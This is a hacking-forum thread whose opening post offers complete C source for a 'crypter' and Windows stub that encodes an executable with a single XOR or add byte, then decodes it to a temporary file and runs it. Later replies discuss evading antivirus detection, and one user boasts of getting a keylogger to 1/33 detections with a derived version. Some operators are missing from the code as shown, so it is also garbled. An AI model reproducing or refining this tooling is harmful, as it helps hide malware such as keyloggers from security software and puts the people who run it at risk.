Author Topic: [C] Simple Crypter + Stub  (Read 16483 times)

0 Members and 5 Guests are viewing this topic.

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
[C] Simple Crypter + Stub
« on: November 26, 2010, 05:39:30 pm »
I made this when I was bored this summer. It cyphers files by adding or xoring one byte (user-selected). It includes a stub for working with exe's.

Crypter:
Code: (c) [Select]
/*
    Ca0s Crypt v1
    Crypts files playing with bytes.
    Two types:
         /- Byte
        ^   Byte
    Includes 19856 bytes stub for working with exe's. If you compile the stub and size is different, you have to
        change 'stubSize' variable or set it when calling the program, with argv.
       
    [st4ck-3rr0r.blogspot.com]
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <ctype.h>

void uso();

int isExe=0, jobMode=0, cryptMode=1, x, originalSize, stubSize=19856, error=0;
FILE *originalFile, *stubFile, *newFile;
struct stat myStat;
char *tmpCByte;

char hexConv[32]={'0', 0x00, '1', 0x01, '2', 0x02, '3', 0x03, '4', 0x04, '5', 0x05, '6', 0x06, '7', 0x07, '8', 0x08, '9', 0x09, 'A', 0x0A, 'B', 0x0B, 'C', 0x0C, 'D', 0x0D, 'E', 0x0E, 'F', 0x0F};

int main(int argc, char *argv[])
{
  printf("Ca0s Crypt v1\n\n");

  char *fileName, *newFileName;
  char *cByte=(char *)malloc(1);
  for(x=0; x<argc; x  )
  {
        if(strcmp(argv[x], "-exe")==0) isExe=1;
        if((strcmp(argv[x], "-file")==0)    && (argc>(x 1))) fileName=argv[x 1];
        if((strcmp(argv[x], "-w")==0)       && (argc>(x 1))) newFileName=argv[x 1]; 
        if((strcmp(argv[x], "-job")==0)     && (argc>(x 1)))
        {
            if(strcmp(argv[x 1], "crypt")==0) jobMode=1;
            else if(strcmp(argv[x 1], "decrypt")==0) jobMode=2;
        }
        if((strcmp(argv[x], "-crypt")==0)   && (argc>(x 1)))
        {
            if(strcmp(argv[x 1], "1")==0) cryptMode=1; //  /- 0x20
            if(strcmp(argv[x 1], "2")==0) cryptMode=2; // ^0x20
        }
        if((strcmp(argv[x], "-byte")==0)    && (argc>(x 1)))
        {
            if(strlen(argv[x 1])==2)
            {
                tmpCByte=(char *)malloc(1);
                *tmpCByte=0x00;
                char *argByte=(char *)malloc(2);
                memcpy(argByte, argv[x 1], 2);
                char *conversion=(char *)malloc(1);
                int y=0, z=0, good=0;
                for(y=0; y<=1; y  )
                {
                    good=0;
                    memcpy(conversion, argByte y, 1);
                    for(z=0; z<31; z  )
                    {
                        if(toupper(*conversion) == hexConv[z])
                        {
                            good=1;
                            if((y==0) && (hexConv[z 1]!=0x00)) *tmpCByte =hexConv[z 1]*16;
                            else *tmpCByte =hexConv[z 1];
                            break;
                        }
                    }
                    if(good==0)
                    {
                        error=1;
                        break;
                    }
                }
            }
            else error=1;
        }
        if((strcmp(argv[x], "-stubsize")==0)    && (argc>(x 1))) stubSize=atoi(argv[x 1]);
  }
 
  if((fileName==NULL) || (newFileName==NULL) ||(jobMode==0) || (error==1)) uso();
 
  printf("Original file: %s\n", fileName);
  originalFile=fopen(fileName, "rb");
  if(originalFile==NULL)
  {
        printf("Error: can't open file to crypt.\n");
        return 0;
  }
  fstat(fileno(originalFile), &myStat);
  originalSize=myStat.st_size;
  printf("Size: %d bytes.\n", originalSize);
 
  newFile=fopen(newFileName, "wb");
  if(newFile==NULL)
  {
        printf("Error: can't create output file.\n");
        return 0;
  }
 
  if(jobMode==1) printf("Job: crypt.\n");
  else if(jobMode==2) printf("Job: decrypt.\n");
 
  if(cryptMode==1) printf("Mode:  /- BYTE\n");
  else if(cryptMode==2) printf("Mode: ^ BYTE\n");
 
  if(tmpCByte==NULL)
  {
        *cByte=0x20;
        printf("Using default byte (0x20).\n");
  }
  else
  {
        cByte=tmpCByte;
        printf("Using byte 0x%x.\n", (unsigned char)*cByte);
  }
 
  if(isExe==1) printf("Working with a EXE. Using stub.\n");
  if((isExe==1) && (jobMode==2))
  {
        printf("Stub's size: %d bytes.\n", stubSize);
        stubSize =2;
  }
 
  char *originalBuffer=(char *)malloc(originalSize);
  char *tmpByte1=(char *)malloc(1);
  char *tmpByte2=(char *)malloc(1);
  fread(originalBuffer, originalSize, 1, originalFile);
 
  if((isExe==1) && (jobMode==1))
  {
        char *modeByte=(char *)malloc(1);
        switch(cryptMode)
        {
            case 1:
                *modeByte=0x01;
                break;
            case 2:
                *modeByte=0x02;
                break;
        }
        FILE *myStub=fopen("stub.exe", "rb");
        if(myStub==NULL)
        {
            printf("Error: can't open stub.\n");
            return 0;
        }
        while(fread(tmpByte2, 1, 1, myStub)) fwrite(tmpByte2, 1, 1, newFile);
        fclose(myStub);
        fwrite(modeByte, 1, 1, newFile);
        fwrite(cByte, 1, 1, newFile);
  }
  if((isExe==1) && (jobMode==2))
  {
        originalBuffer =stubSize;
        originalSize-=stubSize;
  }
 
  for(x=0; x<originalSize; x  )
  {
        memcpy(tmpByte1, originalBuffer x, 1);
        if(jobMode==1)
        {
            switch(cryptMode)
            {
                case 1:
                    *tmpByte1 =*cByte;
                    break;
                case 2:
                    *tmpByte1^=*cByte;
                    break;
            }
            fwrite(tmpByte1, 1, 1, newFile);
        }
        else if(jobMode==2)
        {
            switch(cryptMode)
            {
                case 1:
                    *tmpByte1-=*cByte;
                    break;
                case 2:
                    *tmpByte1^=*cByte;
                    break;
            }
            fwrite(tmpByte1, 1, 1, newFile);
        }
  }
 
  fclose(originalFile);
  fclose(newFile);
  printf("\nTerminado. Archivo creado en %s\n", newFileName);
  return 0;
}

void uso()
{
    printf("Mandatory args:\n\t-file PATH\t\tSets file to crypt\n\t-w PATH\t\t\tSets output file\n\t-job [crypt|decrypt]\tWhat to do\n");
    printf("Optional args:\n\t-exe\t\t\tInclude stub, for exe's\n\t-byte BYTE (00-FF)\tChanges crypt-byte (default 0x20)\n\t-crypt 1/2\t\tCrypt mode. 1( -BYTE) 2(^BYTE)\n\t-stubsize SIZE\tSets stub size when working with a exe. Default: 19856\n");
    exit(0);
}

Stub:
Code: (c) [Select]
/*
    Stub para Ca0s Crypt v1
    If you modify source source, change MySize to new size in bytes
    [st4ck-3rr0r.blogspor.com]
*/

#include <sys/stat.h>
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <process.h>

#define MySize 19856

FILE *mySelf, *tmpFile;
struct stat myStat;
char myName[MAX_PATH], tmpName[MAX_PATH];
int embedSize, x;
char *myByte, *modeByte, *cByte;

int main()
{
    GetModuleFileName(NULL, myName, sizeof(myName));
    stat(myName, &myStat);
    embedSize=myStat.st_size-MySize;
    mySelf=fopen(myName, "rb");
    lseek(fileno(mySelf), MySize, SEEK_SET);
    tmpnam(tmpName);
    tmpFile=fopen(tmpName, "wb");
    myByte=(char *)malloc(1);
    modeByte=(char *)malloc(1);
    cByte=(char *)malloc(1);
    fread(modeByte, 1, 1, mySelf); /// Crypt mode
    fread(cByte, 1, 1, mySelf);     // Crypt byte
    for(x=0; x<embedSize; x  )
    {
        fread(myByte, 1, 1, mySelf);
        if(*modeByte==0x01)
            *myByte-=*cByte;
        if(*modeByte==0x02)
            *myByte^=*cByte;
        fwrite(myByte, 1, 1, tmpFile);
    }
    fclose(mySelf);
    fclose(tmpFile);
    char *execPath[2];
    execPath[0]=tmpName;
    execPath[1]=NULL;
    execve(execPath[0], execPath, NULL);
   
    return 0;
}

Mandatory args:
-file PATH -> Sets file to crypt
-w PATH -> Sets output file
-job [crypt|decrypt] -> What to do
Optional args:
-exe -> Include stub, for exe's
-byte BYTE (00-FF) -> Changes crypt-byte (default 0x20)
-crypt 1/2 ->  Crypt mode. 1( -BYTE) 2(^BYTE)
-stubsize SIZE -> Sets stub size when working with a exe. Default: 19856
« Last Edit: December 14, 2010, 05:29:19 pm by Satan911 »

Offline Satan911

  • VIP
  • Knight
  • *
  • Posts: 289
  • Cookies: 25
  • Retired god/admin
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #1 on: November 26, 2010, 07:33:10 pm »
Great for people looking for open source crypter.

Thanks for sharing.
Satan911
Evilzone Network Administrator

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #2 on: November 26, 2010, 10:30:27 pm »
Note: Its a scantime crypter, not runtime. But still a good example :)
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline Solo.wolf2013

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 0
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #3 on: April 22, 2013, 10:25:58 am »
Note: Its a scantime crypter, not runtime. But still a good example :)
What you mean by "scantime" & "runtime"?

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #4 on: April 22, 2013, 10:48:40 am »
What you mean by "scantime" & "runtime"?

A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline bluechill

  • Cybermancer
  • Royal Highness
  • ****
  • Posts: 682
  • Cookies: 344
  • I am the existence in these walls
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #5 on: April 22, 2013, 01:51:32 pm »
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.

It's not that hard to modify to make it a runtime crypter.
I have dreamed a dream, but now that dream has gone from me.  In its place now exists my own reality, a reality which I have created for myself by myself.

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [C] Simple Crypter + Stub
« Reply #6 on: April 22, 2013, 06:29:25 pm »
This is awesome bro. I will for sure use this as an example :)

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: [C] Simple Crypter + Stub
« Reply #7 on: April 22, 2013, 06:47:45 pm »
I hate looking at my own code from some years ago, I almost always find it awful. But thanks :P

Offline Stackprotector

  • Administrator
  • Titan
  • *
  • Posts: 2515
  • Cookies: 205
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #8 on: April 23, 2013, 08:01:36 am »
This is awesome bro. I will for sure use this as an example :)
What are you working on. I was planning to create something like this for my encoder/decoder.
~Factionwars

Offline x0nic

  • Peasant
  • *
  • Posts: 51
  • Cookies: 5
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #9 on: May 23, 2015, 12:39:30 am »
I doubt that OP will ever read it, but still: THANKS for sharing this! I learned quite a bit about the stub crypting concept

Here's ca0s crypt v2.0, written by me: https://evilzone.org/programming-newbies/%28c-source%29-cli-stub-crypter-%28noobfriendly%29/msg106155/#msg106155 
I hope you don't feel copy&pasted or anything :P and that it was okay to re-use your name

Cheers buddy
« Last Edit: May 23, 2015, 12:43:11 am by x0nic »

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #10 on: May 23, 2015, 01:55:30 pm »
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.

Actually "runtime crypted" files are still detectable in memory.
These terms are misnomers imo. They should call it temp file execution vs in-memory execution or something similar, but not "scantime/runtime protected".

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: [C] Simple Crypter + Stub
« Reply #11 on: May 23, 2015, 05:39:29 pm »
I doubt that OP will ever read it, but still: THANKS for sharing this! I learned quite a bit about the stub crypting concept
no

Well, I'm glad you actually found that piece of crap that was my "crypter" useful . It was just a damn simple and naive example implementation.

I hope you don't feel copy&pasted or anything :P and that it was okay to re-use your name
Cheers buddy

Nah, no problem.

For the next version, if you are going to continue developing it, you could try to avoid writing the original file into disk and just use the same process as the stub, for example.
« Last Edit: May 23, 2015, 05:39:45 pm by ca0s »

Offline x0nic

  • Peasant
  • *
  • Posts: 51
  • Cookies: 5
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #12 on: May 23, 2015, 07:07:25 pm »
yo mate! congratz for still being alive
 
It was just a damn simple and naive example implementation.
And that's why it perfectly fitted my needs :D i.e. abilities. Many other stub sources I've found were either .net crap or just way above my comprehension skill. (But since you helped me understanding general stub concepts, they're not so hard to analyze anymore. Thus I've already got sum new projects in the pipeline ;) )

Nah, no problem.
<3

For the next version, if you are going to continue developing it, you could try to avoid writing the original file into disk and just use the same process as the stub, for example.
Already done (something similar), haha, but thanks for the hint. The code I've posted is actually just the educational version, addressing interested newbes whose brain is as slow as mine xP
However, after a few minor improvements, this script can do surprisingly well! Just got a 1/33 on nodistribute with some generic keylogger, hihi

Anyway, thanks again :3 keep it up bro

Offline TitanFury

  • /dev/null
  • *
  • Posts: 10
  • Cookies: 0
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #13 on: May 25, 2015, 02:59:01 am »
Already done (something similar), haha, but thanks for the hint. The code I've posted is actually just the educational version, addressing interested newbes whose brain is as slow as mine xP
However, after a few minor improvements, this script can do surprisingly well! Just got a 1/33 on nodistribute with some generic keylogger, hihi

Anyway, thanks again :3 keep it up bro

For all the work put into AV systems there is a lot of stupid simple ways to defeat just a generic static-scan, the harder stuff is defeating properly implemented (both software and user wise) live monitoring (why is this program opening a socket, is this allowed, etc)

Offline x0nic

  • Peasant
  • *
  • Posts: 51
  • Cookies: 5
    • View Profile
Re: [C] Simple Crypter + Stub
« Reply #14 on: May 25, 2015, 02:50:45 pm »
For all the work put into AV systems there is a lot of stupid simple ways to defeat just a generic static-scan, the harder stuff is defeating properly implemented (both software and user wise) live monitoring (why is this program opening a socket, is this allowed, etc)
Ye, still shocked that some basic knowledge is all one needs to bypass em. I don't want to imagine what some of the more experienced people could achieve... this shit kicked my paranoia up to a whole new level >.<